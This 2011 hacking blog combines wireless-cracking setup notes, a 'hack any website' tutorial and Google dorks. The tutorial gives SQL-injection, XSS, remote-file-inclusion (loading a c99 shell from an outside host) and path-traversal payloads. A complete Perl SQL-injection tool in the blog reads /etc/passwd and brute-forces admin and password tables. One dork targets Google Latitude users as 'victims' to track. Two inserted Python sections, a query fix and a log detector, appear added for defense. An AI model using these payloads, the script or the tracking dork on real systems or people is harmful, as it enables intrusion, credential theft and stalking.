
Tuesday, June 21, 2011

Website that has a lot of Lucid software.

Lucid is part of Ubuntu and Ubuntu is part of Debian.
So you can figure out how it works.
Anyway, this is all I have so far with my Lucid.
(All the software will work with the HP Mini 210.)
http://packages.ubuntu.com/lucid/
You can get aircrack-ng, Wireshark, etc. here. Good luck.

Using Puppy Linux and HP Mini 210.

This combination of software and hardware is almost perfect for hacking, but it requires some sacrifices: no sound, typing, or mouse gestures, and no support for extra hardware (e.g. wireless key button, sound key button).
It supports many utilities; basically, if any software is supported in Lucid (Ubuntu > Debian), then it will work.

Backtrack 4 will not support Broadcom 43x drivers at all, but Puppy Linux will support everything that is possible with BC43x chipsets. Backtrack 4 supports sound and just scroll gestures on the touchpad, but it does not support portability.

Monday, June 20, 2011

Running aircrack-ng suite natively on HP-Mini 210-1000

This guide shows how to make the aircrack-ng suite work with the Broadcom 4312 in the HP Mini 210-1000.

Requirements:
Flash drive (more than 2 GB)
Windows (already comes with the HP Mini)

1.) Get YUMI (Win32)
2.) In YUMI, look for Puppy Linux and download it.
3.) Create the live USB with YUMI.
4.) Make sure your HP Mini BIOS boots USB as the first device.
5.) Boot up Puppy Linux.
6.) Select wlan0 (because it supports Broadcom :D)
7.) Get any web browser.
8.) Download the file from http://www.murga-linux.com/puppy/viewtopic.php?t=60202
9.) Read more about the aircrack-ng suite.

So, that's how you get aircrack-ng to work with the HP Mini 210-1000.
It proves that the HP Mini is a hacker tool.

Friday, June 17, 2011

How to Hack any Website.

This tutorial was made by Hini Aes, dedicated to Soumyodeep on Facebook.

Introduction:
No computer network is 100% secure, period, but some networks are secure enough against a hacker. My topic is hacking websites, so first you need to know what an exploit is, in my own terms so that you will understand.
Exploit: The weak section of a website. With an exploit you can hack any computer system. Sometimes an exploit might seem to be limited, but it can be used to your advantage for something else, maybe an HTML trojan or virus.

Terms:
Deface: to replace the code or file of the original index page.
SQL Injection/SQLi: en.wikipedia.org/wiki/SQL_injection
XSS: en.wikipedia.org/wiki/Cross-site_scripting
LFI/RFI: http://www.scribd.com/doc/6498408/Remote-and-Local-File-Inclusion-Explained

SQL Injection Example:

www.sql.com/index.php?id=1'

If you put ' after a .php?value=# and get an error in the browser like "error in your MySQL syntax",
then the site is vulnerable to SQL injection.
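
The syntax error described above appears because the id value becomes part of the SQL text. As an added example (not from the original post), this Python sketch uses an in-memory SQLite table in place of the site's PHP/MySQL stack, which is an assumption, and shows the concatenated query breaking on 1' while the bound-parameter version treats it as data; all function and table names are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed sample data standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)", [(1, "Home"), (2, "Contact")])
    return db

def lookup_concatenated(db, raw_id):
    """Before: the id value from the URL becomes part of the SQL text."""
    query = "SELECT title FROM pages WHERE id = " + raw_id
    try:
        return [row[0] for row in db.execute(query)], None
    except sqlite3.Error as exc:
        # A stray quote changes the statement itself, so the parser rejects it.
        # Echoing this message to the browser is what reveals the flaw.
        return [], str(exc)

def lookup_bound(db, raw_id):
    """After: reject non-numeric ids, then bind the value as a parameter."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return [], None  # handled as "no such page"; no database detail leaks
    rows = db.execute("SELECT title FROM pages WHERE id = ?", (int(raw_id),))
    return [row[0] for row in rows], None

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):
        print(repr(value), lookup_concatenated(db, value), lookup_bound(db, value))
```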

XSS (Cross Site Scripting):
www.xsssite.com/search.php?query=<h1>this site is vulnerable to xss </h1>

Remote & Local File Inclusion.
RFI Exploit.
www.northkoreans.com/index.php?include=http://www.haxorz.com/c99.txt
By using the parameter include=http://www.haxorz.com/c99.txt,
the page will include c99.txt from haxorz.com. If you use a .php shell, it will appear on haxorz.com, but if it is in .txt form, it will load its contents from northkoreans.com.
LFI
www.lfime.com/index.php?id=../../../../../../etc/pwd
You have to search about that, sorry.

Register on www.hackforums.net, read the tutorials and do them; then you will become a website hacker.

Tuesday, June 14, 2011

Automatic SQL Injection with Brute Force [Perl Script]

The good thing about this script is that it is multiplatform and it's an auto-injection tool, so it makes the process faster, but it will not always work compared with a manual SQL injection.

Requirements:
Perl

Code:


#!/usr/bin/perl
 
###########################################################################################
#                           -[+]- SQL-PwnZ v1.1 | By Login-Root -[+]-                   ###
###########################################################################################
 
###########################################################################################
# [+] inf0:                                                                             ###
###########################################################################################
# It Searchs:                                                                           ###
# ===========                                                                           ###
#  - Nº of columns                                                                      ###
#  - Information_Schema && MySQL.User                                                   ###
#  - LOAD_FILE                                                                          ###
#  - Tables                                                                             ###                                                
#  - Columns                                                                            ###
#                                                                                       ###
#  ...and save it on a nice text file.                                                  ###
#                                                                                       ###
###########################################################################################
 
###########################################################################################
# [+] Use:                                                                              ###
###########################################################################################
# perl sqlpwnz.pl [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]             ###
#   [WEBSITE]: http://www.web.com/index.php?id=                                         ###
#   [COLUMNS]: Limit of columns to check                                                ###
#   [FILE]: File where save the results                                                 ###
#   [COMMENT]: '/*' or '--' (Without '') (Optional)                                     ###
#   [-T]: Try to brute force tables (Optional)                                          ###
#   [-C]: Try to brute force columns (Optional)                                         ###
#   [-NOCHECK]: Skip the initial check (Optional)                                       ###
###########################################################################################
 
###########################################################################################
# [+] c0ntact:                                                                          ###
###########################################################################################
# MSN:    no.more@passport.com                                                          ###
# Jabber: login-root@x23.eu                                                             ### 
# E-Mail: login_root@yahoo.com.ar                                                       ###
#                                                                                       ###
###########################################################################################
 
 
###########################################################################################
# [+] sh0utz:                                                                           ###
###########################################################################################
# In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion                 ###
# Many thanks to boER, who teach me a little of perl ;D                                 ###
# VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM                    ###
###########################################################################################
 
###########################################################################################
# ARGENTINA PRODUCT :)                                                                  ###
###########################################################################################
 
use LWP::Simple;
 
if(!$ARGV[2])
        {
                 print "\n\n-[+]- SQL-PwnZ v1.1 | By Login-Root -[+]-\n=========================================";
                 print "\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";
                 print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '') (Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n";
                 exit (0);
        }
        
@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
          'name','names','nombre','nombres','usuarios','member','members','admin_table',
          'miembro','miembros','membername','admins','administrator',
          'administrators','passwd','password','passwords','pass','Pass',
          'tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
          'member_password','mods','mod','moderators','moderator','user_email',
          'user_emails','user_mail','user_mails','mail','emails','email','address',
          'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
          'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
          'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
          'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
          'sistema_usuario','sistema_password','contrasena','auth','key','senha',
          'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
      'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
      'membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
      'associated','accnt','customers','customer','membres','administrateur','utilisateur',
      'tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
      'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
          'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
 
@nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
          'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
          'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
          'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
          'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
          'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
 
if ( $ARGV[0]   !~   /^http:/ ) 
  {
      $ARGV[0] = "http://" . $ARGV[0];
  }
 
if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--")
{
        $cmn.= "+";
        $cfin.="--";
        print "\n[+] Comments to use: '--' & '+'";      
}
else
{
        $cmn.= "/**/";
        $cfin.= "/*";
        print "\n[+] Comments to use: '/*' & '/**/'";
}
 
open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";
if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK")
  {
      print "\n[!] Skipping the initial check...\n";
      print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
  }
else
  {
      print "\n[!] Checking if the website is vulnerable...\n";
      $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin;
      $response=get($sql)or die("[-] Wrong Website, check it\n");
      if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ ||         $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/)
        {
            print "[+] Vulnerable website, script continues...\n";
            print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
        }
        else
          {
            print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n";
            exit(1);
          }
  }
print "\n[!] Looking up columns...\n";
for ($column = 0 ; $column < $ARGV[1] ; $column ++)
{
        $union.=','.$column;
        $inyection.=','."0x6c6f67696e70776e7a";
    if ($column == 0)
      {
          print WEB "\n[COLUMNS]:\n\n";
          $inyection = '';
         $union = '';
     }
   $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
   $response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n");
   if($response =~ /loginpwnz/)
     {
        $column ++;
        print "[+] The site has $column columns\n\n";
        $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
        print "$sql\n";
        print WEB "$sql\n";
        print "\n[!] Checking if Information_Schema exists...";
        $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
        $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
        if($response =~ /loginpwnz/)
                {
                        print "\n[+] Information_Schema available...saving in $ARGV[2]";
           $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
           print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
                
                }
        else
                {
                print "\n[-] Information_Schema unavailable";
                }
        print "\n[!] Checking if MySQL.User exists...";
        $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
        $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
        if($response =~ /loginpwnz/)
                {
                        print "\n[+] MySQL.User available...saving in $ARGV[2]";
                        $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
                print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
                
                }
        else
                {
                print "\n[-] MySQL.User unavailable";
                }
        while ($loadcont < $column-1)
           {
                $loadfile.=','.'load_file(0x2f6574632f706173737764)';
                $loadcont++;
           }
        print "\n[!] Checking if it is possible to inject LOAD_FILE...";
       $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
        $response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");
        if($response =~ /root:x:/)
                {
                        print "\n[+] LOAD_FILE available...saving in $ARGV[2]";
                        print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";
         }
        else
                {
                print "\n[-] LOAD_FILE unavailable";
                }
        if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T")
                {
             print "\n\n[!] Brute forcing tables...";
             print WEB "\n\n[TABLES]:\n\n";
             foreach $tabla(@nombretabla)
               {
                 chomp($tabla);
                 $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
                 $response=get($sql)or die("[-] Impossible to get tables\n");
                 if($response =~ /loginpwnz/)
                   {
                       print "\n[+] Table $tabla exists...saving in $ARGV[2]";
                       $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
                       print WEB "$sql\n";
                   }
               }
                }
       if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C")
         {
                print "\n\n[!] Table to brute force columns: ";
           $tabla.=<STDIN>;
           chomp($tabla);
           print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n";
           foreach $columna(@nombrecolumna)
           {
            chomp($columna);
            $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
            $response=get($sql)or die("[-] Impossible to get columns\n");
            if ($response =~ /loginpwnz/)
                 {
                     print "\n[+] Column $columna available...saving in $ARGV[2]";
                     print WEB "$columna\n";
                 }
           }
       }
       print WEB "\n\n\n[*EOF*]";
       print "\n\n[+] Everything saved correctly in $ARGV[2]\n\n";
       print "## c0ded by Login-Root | 2008 ##\n\n";
       exit (0);
     }
}
print "[-] Impossible to find number of columns, try more columns\n\n";
print "## c0ded by Login-Root | 2008 ##\n\n";
exit (0);
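
Every request the script above sends carries a fixed marker or keyword, and the probes in the earlier website tutorial have equally recognizable shapes, so both can be flagged in web server access logs. This is an added detection example, not part of the original post or the script: the combined-log line format, the rule names and the sample log lines are constructed assumptions, and the rule set goes beyond the script to cover the tutorial's quote, markup, remote-include and traversal requests.

```python
import re
from urllib.parse import unquote

# Rule name -> pattern, applied to the decoded, lower-cased request target.
RULES = {
    "sqlpwnz-marker": re.compile(r"0x6c6f67696e70776e7a"),  # hex for 'loginpwnz'
    "load-file-probe": re.compile(r"load_file\s*\("),
    "union-select": re.compile(r"union select"),
    "schema-probe": re.compile(r"from (information_schema\.tables|mysql\.user)"),
    "quote-probe": re.compile(r"=[^&=]*'(&|$)"),  # may also match names like O'Brien
    "markup-in-query": re.compile(r"=[^&]*<\w+[^>]*>"),
    "remote-include": re.compile(r"=(https?|ftp)://"),
    "path-traversal": re.compile(r"(\.\./){2,}"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(target):
    """Percent-decode, then collapse the separators the script uses ('+', '/**/')."""
    text = unquote(target).lower()
    return re.sub(r"(\+|/\*\*/|\s)+", " ", text)

def scan(lines):
    """Return (client_ip, sorted rule names) for each request matching a rule."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        target = normalize(m.group(1))
        hits = sorted(name for name, rx in RULES.items() if rx.search(target))
        if hits:
            findings.append((line.split()[0], hits))
    return findings

# Constructed access-log lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Jun/2011:10:01:02 +0000] "GET /index.php?id=1%27 HTTP/1.1" 200 512',
    '203.0.113.7 - - [14/Jun/2011:10:01:09 +0000] "GET /index.php?id=-1/**/union/**/select/**/0x6c6f67696e70776e7a,0x6c6f67696e70776e7a/* HTTP/1.1" 200 734',
    '203.0.113.7 - - [14/Jun/2011:10:01:15 +0000] "GET /index.php?id=-1+union+select+load_file(0x2f6574632f706173737764)-- HTTP/1.1" 200 640',
    '198.51.100.4 - - [14/Jun/2011:10:02:00 +0000] "GET /index.php?id=2 HTTP/1.1" 200 4096',
    '198.51.100.9 - - [14/Jun/2011:10:03:11 +0000] "GET /search.php?query=%3Ch1%3Etest%3C/h1%3E HTTP/1.1" 200 900',
    '198.51.100.9 - - [14/Jun/2011:10:03:20 +0000] "GET /index.php?include=http://files.example.test/page.txt HTTP/1.1" 200 100',
    '198.51.100.9 - - [14/Jun/2011:10:03:31 +0000] "GET /index.php?id=../../../../etc/passwd HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```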

Monday, June 13, 2011

important information [dork]

Site: google.com/latitude - This is a free application where you can track
your PC, laptop and mobile; just log in there and you will be tracked
for free (it is used to track yourself live, and you can put this in blogs to show
where you are).

I made a simple dork that shows a couple of people; after some years, when
this application grows stronger, you can get tons of victims.

*allinurl:http://www.google.co.in/latitude/apps/badge/api?user=*



By *The ALLSTAR*

Sensitive file [dork] ionCube

This dork shows sensitive information that may be used for hacking.
dork: inurl:loader-wizard ext:php
 *www.google.com*

[Dork] More Accurate vBulletin installation finder [Dork]

inurl:/install/install.php intitle:vBulletin * Install System



Use this with a Google-based search engine (www.google.com).